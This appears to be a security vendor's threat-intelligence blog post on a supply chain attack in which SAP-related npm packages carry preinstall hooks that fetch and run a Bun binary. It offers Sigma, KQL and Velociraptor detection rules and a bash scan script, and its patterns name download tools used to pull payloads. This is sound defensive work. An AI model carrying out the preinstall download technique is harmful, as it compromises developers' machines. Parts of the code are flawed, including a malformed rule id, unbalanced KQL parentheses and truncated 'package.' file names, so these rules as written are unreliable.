Back to Intelligence

Mini Shai-Hulud: Detecting SAP NPM Supply Chain Attack and Bun Binary Abuse

SA
Security Arsenal Team
April 30, 2026
5 min read

The open-source ecosystem faces a persistent threat from supply chain compromises, and the recent "Mini Shai-Hulud" attack campaign targeting SAP NPM packages is a stark reminder. Attackers have successfully weaponized the trust in SAP-related packages by injecting malicious preinstall hooks. These hooks are designed to fetch and execute a binary of Bun, a JavaScript toolkit and runtime, to bypass conventional security monitoring and establish a foothold.

For defenders, this is not just a patch management issue; it is an active intrusion scenario. Developers running npm install in your environment are effectively executing malware if they pull these compromised packages. The use of the Bun runtime is a deliberate evasion technique, designed to blend in with legitimate development tooling while executing unauthorized shell commands. Immediate action is required to identify compromised build pipelines and developer workstations.

Technical Analysis

Affected Products and Platforms:

  • Platform: Node.js environments utilizing NPM (Node Package Manager).
  • Targeted Packages: Various packages masquerading as or related to SAP libraries (specific package names are being tracked via industry intelligence feeds, but the TTP is broad).
  • Operating Systems: Cross-platform (Windows, Linux, macOS) where NPM is installed.

Attack Mechanism:

  1. Initial Vector: A developer or CI/CD pipeline executes npm install on a compromised package.
  2. Execution: The package's package. contains a malicious preinstall script. This script runs automatically before the package installation completes.
  3. Payload Delivery: The preinstall script uses a native tool (like curl or PowerShell) to download a bun binary from an external attacker-controlled URL.
  4. Execution & Evasion: The script executes the downloaded bun binary. Bun is then used to run shell commands or scripts, potentially establishing a reverse shell or downloading additional payloads. Because Bun is a legitimate (though less common) tool, its execution may fly under the radar of EDRs tuned strictly for node, python, or powershell.

Exploitation Status:

  • Status: Confirmed active exploitation in the wild.
  • Nature: Supply chain compromise (malicious package publication).

Detection & Response

Sigma Rules

YAML
---
title: Suspicious Bun Binary Execution via NPM
id: 8a4d9b12-3e5c-4f1a-a9b8-7c6d5e4f3a21
status: experimental
description: Detects the execution of the Bun runtime spawned by NPM or Node processes, indicative of the Mini Shai-Hulud supply chain attack.
references:
  - https://www.securityweek.com/sap-npm-packages-targeted-in-supply-chain-attack/
author: Security Arsenal
date: 2026/04/06
tags:
  - attack.execution
  - attack.t1204
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\npm.exe'
      - '\node.exe'
  selection_child:
    Image|endswith:
      - '\bun.exe'
      - '\bun'
  condition: all of them*
falsepositives:
  - Legitimate use of Bun by developers (rare in enterprise)
level: high
---
title: NPM Preinstall Hook Spawning Network Tools
id: 9b5e0c23-4f6d-5g2b-b0c9-8d7e6f5a4b32
status: experimental
description: Detects NPM spawning network tools (curl, wget) often used in malicious preinstall hooks to download payloads like the Bun binary.
references:
  - https://www.securityweek.com/sap-npm-packages-targeted-in-supply-chain-attack/
author: Security Arsenal
date: 2026/04/06
tags:
  - attack.command_and_control
  - attack.t1105
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|contains:
      - 'npm'
      - 'node'
  selection_child:
    Image|endswith:
      - '\curl.exe'
      - '\wget.exe'
      - '\powershell.exe'
      - '\pwsh.exe'
  selection_cli:
    CommandLine|contains:
      - 'invoke-webrequest'
      - 'downloadfile'
  condition: all of selection_*
falsepositives:
  - Legitimate build scripts fetching resources
level: medium

KQL (Microsoft Sentinel / Defender)

KQL — Microsoft Sentinel / Defender
// Hunt for Bun execution or NPM spawning suspicious download tools
DeviceProcessEvents
| where Timestamp > ago(7d)
| where (ProcessName has "bun" or ProcessName has "bun.exe") 
   or ( 
      InitiatingProcessFileName has "npm" and 
      (ProcessName in ("curl.exe", "wget.exe", "powershell.exe", "cmd.exe") or 
       ProcessCommandLine has_any ("Invoke-WebRequest", "DownloadFile", "curl", "wget")
     )
| extend HostName = DeviceName, Account = AccountName
| project Timestamp, HostName, Account, ProcessName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc

Velociraptor VQL

VQL — Velociraptor
-- Hunt for Bun processes and suspicious package. modifications
SELECT Pid, Name, Exe, CommandLine, StartTime
FROM pslist()
WHERE Name =~ "bun"
   OR Exe =~ "bun"

-- Search for package. files containing 'preinstall' and 'bun'
SELECT FullPath, Mtime, Size
FROM glob(globs="/*/package.")
WHERE read_file(filename=FullPath) =~ "preinstall" 
  AND read_file(filename=FullPath) =~ "bun"

Remediation Script (Bash)

Bash / Shell
#!/bin/bash
# Remediation script to check for suspicious 'preinstall' hooks involving 'bun'
# Scans current directory and subdirectories for package. files

echo "Scanning for suspicious package. files..."

find . -name 'package.' -type f -exec sh -c '
  for file; do
    if jq -e ".scripts.preinstall" "$file" > /dev/null 2>&1; then
      # If preinstall exists, check for keywords "bun" or "http"
      if grep -qi "bun" "$file" || grep -qi "http" "$file"; then
        echo "[!] Suspicious preinstall hook found in: $file"
        # Output the script content for review
        jq ".scripts.preinstall" "$file"
      fi
    fi
  done
' sh {} +

echo "Scan complete. Please review the output above."
echo "If malicious packages are found, delete node_modules and reinstall from trusted sources."

Remediation

  1. Identify and Isolate: Immediate isolation of developer workstations or build agents identified in the detection phase.

  2. Package Audit: Review your package-lock. or yarn.lock files against the list of compromised SAP-related packages published in industry advisories (e.g., ReversingLabs, Sonatype).

  3. Cleanup:

    • Delete the node_modules directory of affected projects.
    • Remove the specific malicious version from package..
    • Update to the latest, verified safe version of the package.
    • Clear any NPM cache: npm cache clean --force.

  4. Blocking: Implement Application Control (e.g., AppLocker, Windows Defender Application Control) policies to block the execution of unauthorized bun binaries unless explicitly approved by the engineering team.

  5. CI/CD Hardening: Enforce that CI/CD pipelines run with read-only credentials where possible and do not allow arbitrary scripts in preinstall hooks to run (using --ignore-scripts flag if possible during build stages, though this requires testing).

Related Resources

Security Arsenal Managed SOC Services AlertMonitor Platform Book a SOC Assessment soc-mdr Intel Hub

managed-socmdrsecurity-monitoringthreat-detectionsiemsupply-chainnpmsap

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action